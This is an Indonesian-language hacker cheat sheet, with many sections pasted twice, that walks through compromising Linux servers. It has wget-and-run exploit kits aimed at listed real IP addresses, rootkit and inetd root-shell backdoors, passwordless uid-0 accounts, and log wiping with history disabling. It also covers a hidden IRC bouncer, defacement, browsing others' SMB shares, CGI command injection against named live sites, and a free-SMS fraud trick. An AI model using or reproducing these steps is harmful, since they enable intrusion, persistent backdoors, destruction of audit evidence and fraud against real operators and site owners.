rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
TRIK 3 HACKING
=================================================================================================
1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================================================================
1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================================================================
1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0x15 -v 212.70.224.129
=================================================================================================
1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
=================================================================================================
1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
=================================================================================================
1. wget www.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
=================================================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
=================================================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
./sambal -d 0 -C 60 -S IP | grep samba
./sambal -b 0 -v IP <=== attack
=================================================================================================
SecureCRT: http://www.vandyke.com/
TTSSH: http://www.zip.com.au/~roca/ttssh.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/
=================================================================================================
DEFACE
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
=================================================================================================
Install WGET
=================================================================================================
1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+...&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff
./configure
make ssh
./ssh -l root
./ssh -l root 66.136.37.101
./ssh -l root 66.149.178.214
=================================================================================================
: COMMAND ADDUSER :
=================================================================================================
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua
/usr/sbin/useradd tondano -u 0 -d /
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
passwd -d tondano
Changing password for user tondano
Removing password for user tondano
passwd: Success
=================================================================================================
passwd kuntua
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user kuntua
passwd: all authentication tokens updated successfully
password tondano
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user tondano
passwd: all authentication tokens updated successfully
=================================================================================================
1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================================================================
1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================================================================
1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0x15 -v 212.70.224.129
=================================================================================================
1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
=================================================================================================
1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
=================================================================================================
1. wget www.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
=================================================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
=================================================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
./sambal -d 0 -C 60 -S IP | grep samba
./sambal -b 0 -v IP <=== attack
=================================================================================================
SecureCRT: http://www.vandyke.com/
TTSSH: http://www.zip.com.au/~roca/ttssh.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/
=================================================================================================
DEFACE
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
=================================================================================================
Install WGET
=================================================================================================
1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+...&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff
./configure
make ssh
./ssh -l root
./ssh -l root 66.136.37.101
./ssh -l root 66.149.178.214
=================================================================================================
: COMMAND ADDUSER :
=================================================================================================
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua
/usr/sbin/useradd tondano -u 0 -d /
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
passwd -d tondano
Changing password for user tondano
Removing password for user tondano
passwd: Success
=================================================================================================
passwd kuntua
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user kuntua
passwd: all authentication tokens updated successfully
password tondano
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user tondano
passwd: all authentication tokens updated successfully
=================================================================================================
TRIK 2 HACKING
=================================================================================================
BIKIN BACKDOOR
=================================================================================================
echo "kuntua 1979/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135
telnet dengan port "1979"
=================================================================================================
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================================================================
[root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 '*' #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
-----------------------------------------
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
--------- ---- -------
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================================================================
gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================================================================
: BERSIHKAN LOG :
=================================================================================================
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================================================================
securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================================================================
BIKIN BACKDOOR
=================================================================================================
echo "kuntua 1979/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135
telnet dengan port "1979"
=================================================================================================
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================================================================
[root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 '*' #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
-----------------------------------------
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
--------- ---- -------
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================================================================
gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================================================================
: BERSIHKAN LOG :
=================================================================================================
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================================================================
securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================================================================
TRIK 1 HACKING
autor : kawan - kawanku
: TRIK MEMBUAT PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir .... ; cd .... ;
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ;
wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ;
mv ./psybncchk .sh ;
mv ./log/psybnc.log .mud ;
find |grep psybnc
=================================================================================================
: TRIK MENGHAPUS LOG :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir " " ; cd " "
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/" " <== Bersihkan semua tools
25. Test shell dengan port 7788, login as : root, password : gohanz
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA ToNDaNo Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA ToNDaNo Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
------------------------------------------------------------------------------------
from : kawan - kawan ku
: TRIK MEMBUAT PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir .... ; cd .... ;
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ;
wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ;
mv ./psybncchk .sh ;
mv ./log/psybnc.log .mud ;
find |grep psybnc
=================================================================================================
: TRIK MENGHAPUS LOG :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir " " ; cd " "
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/" " <== Bersihkan semua tools
25. Test shell dengan port 7788, login as : root, password : gohanz
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA ToNDaNo Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA ToNDaNo Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
------------------------------------------------------------------------------------
from : kawan - kawan ku
Hole pada CGI
semuanya bisanaya letak kelemahan suatu hole di .cgi
banyak yang sering kita jumpai
cobak kita langsung aja oke:
1. Kalian bukkak google.com
2. allinurl:cgi/*.txt
3. oiiiiiii banyak ya hihihihihii
4. Sekarang kau cobak cari yang belakangnya *.txt
5. Contohnya :
http://www.indiabook.com/cgi-bin/text/text.cgi?ads1.txt|id|
http://www.monhabitat.net/cgi-bin/ad.cgi?pied1.txt|id|
http://www.submitshop.com/cgi-bin/text/text.cgi?ads2.txt|id;uname;pwd|
http://www.photoserviceltee.com/cgi-bin/includer/includer.cgi?preload_img.txt|id;uname;pwd|
banyak yang sering kita jumpai
cobak kita langsung aja oke:
1. Kalian bukkak google.com
2. allinurl:cgi/*.txt
3. oiiiiiii banyak ya hihihihihii
4. Sekarang kau cobak cari yang belakangnya *.txt
5. Contohnya :
http://www.indiabook.com/cgi-bin/text/text.cgi?ads1.txt|id|
http://www.monhabitat.net/cgi-bin/ad.cgi?pied1.txt|id|
http://www.submitshop.com/cgi-bin/text/text.cgi?ads2.txt|id;uname;pwd|
http://www.photoserviceltee.com/cgi-bin/includer/includer.cgi?preload_img.txt|id;uname;pwd|
BUG 10 CODE SMS TELKOMSEL
AUTOR : YUDHAX
PADA EDISI KEMARIN TELAH SAYA TERANGKAN DAN JABARKAN PEMAKAIAN PEMANFAATAN BUG SMS PADA SATELINDO GSM.
PADA KESEMPATAN INI KITA AKAN RUBAH PERMAINAN KE LAWAN MAIN DARI SATELINDO ITU SENDIRI .... TELKOMSEL GSM
SISTEM GSM yang menggunakan teknik switching dengan memanfaatkan system base station
memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone
ke handphone lain yang nota bene mengirimkan suatu data terenscript yang dapat diditeksi oleh pesawat/nomor
tujuan. dalam hal ini hampir semua fasilitas yang dikembangkan GSM tidak memiliki perbedaan yang sangat rumit,
bahkan malah bisa dibilang HAMPIR SAMA. cuma sekarang dari SATELINDO telah melakukan patching pada
sistem transfer smsnya dengan trik "LAMA" (yang notabene masih juga bisa saya tembus dengan trik baru
..maaf satelindo akan saya bahas besok-besok hari bug barunya...) saya ucapkan salut pada SATELINDO
yang telah melakukan banyak perubahan sistem hantar smsnya dan menggunakan serial yang baru :-) .
Bug sms gratis TELKOMSEL kali ini menggunakan trik yang menyerupai BUG SATELINDO yang lama
yaitu 10 nomer code kartu nomor seri produk TELKOMSEL diantaranya ;
seri 226****** yang mempunyai arti +6281226***** (nomor jakarta)
kode kartu yang bug 260**** s/d 269**** dengan head 0812-
yang berarti kita bisa ngirim sms gratis ke nomor SIMPATI dengan seri 081226***** :-)
note 1: kode * diatas merupakan sembarang nomor (atau semua nomor seri kartu simpati yang aktive)
note 2: hanya dapat dilakukan dengan simcard telkomsel
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281226378** )
(yang saya dapatkan yaitu bug terlkomsel simcard versi 2260**** s/d 2269**** <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut) 10 CODE = 2260,2261,2262,2263,2264,2265,2266,2267,2268,2269
3. cara tulis nomor yang dituju menjadi 226378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
Penulis Minta MAAF KEPADA:
1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI TELKOMSEL DAN SEMUA OPERATOR GSM INDONESIA
2. SEMUA PIHAK YANG TERASA TERUGIKAN
3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.
SALAM PENULIS
---- YUDHAX --------
MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT
KITA.
PADA EDISI KEMARIN TELAH SAYA TERANGKAN DAN JABARKAN PEMAKAIAN PEMANFAATAN BUG SMS PADA SATELINDO GSM.
PADA KESEMPATAN INI KITA AKAN RUBAH PERMAINAN KE LAWAN MAIN DARI SATELINDO ITU SENDIRI .... TELKOMSEL GSM
SISTEM GSM yang menggunakan teknik switching dengan memanfaatkan system base station
memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone
ke handphone lain yang nota bene mengirimkan suatu data terenscript yang dapat diditeksi oleh pesawat/nomor
tujuan. dalam hal ini hampir semua fasilitas yang dikembangkan GSM tidak memiliki perbedaan yang sangat rumit,
bahkan malah bisa dibilang HAMPIR SAMA. cuma sekarang dari SATELINDO telah melakukan patching pada
sistem transfer smsnya dengan trik "LAMA" (yang notabene masih juga bisa saya tembus dengan trik baru
..maaf satelindo akan saya bahas besok-besok hari bug barunya...) saya ucapkan salut pada SATELINDO
yang telah melakukan banyak perubahan sistem hantar smsnya dan menggunakan serial yang baru :-) .
Bug sms gratis TELKOMSEL kali ini menggunakan trik yang menyerupai BUG SATELINDO yang lama
yaitu 10 nomer code kartu nomor seri produk TELKOMSEL diantaranya ;
seri 226****** yang mempunyai arti +6281226***** (nomor jakarta)
kode kartu yang bug 260**** s/d 269**** dengan head 0812-
yang berarti kita bisa ngirim sms gratis ke nomor SIMPATI dengan seri 081226***** :-)
note 1: kode * diatas merupakan sembarang nomor (atau semua nomor seri kartu simpati yang aktive)
note 2: hanya dapat dilakukan dengan simcard telkomsel
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281226378** )
(yang saya dapatkan yaitu bug terlkomsel simcard versi 2260**** s/d 2269**** <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut) 10 CODE = 2260,2261,2262,2263,2264,2265,2266,2267,2268,2269
3. cara tulis nomor yang dituju menjadi 226378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
Penulis Minta MAAF KEPADA:
1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI TELKOMSEL DAN SEMUA OPERATOR GSM INDONESIA
2. SEMUA PIHAK YANG TERASA TERUGIKAN
3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.
SALAM PENULIS
---- YUDHAX --------
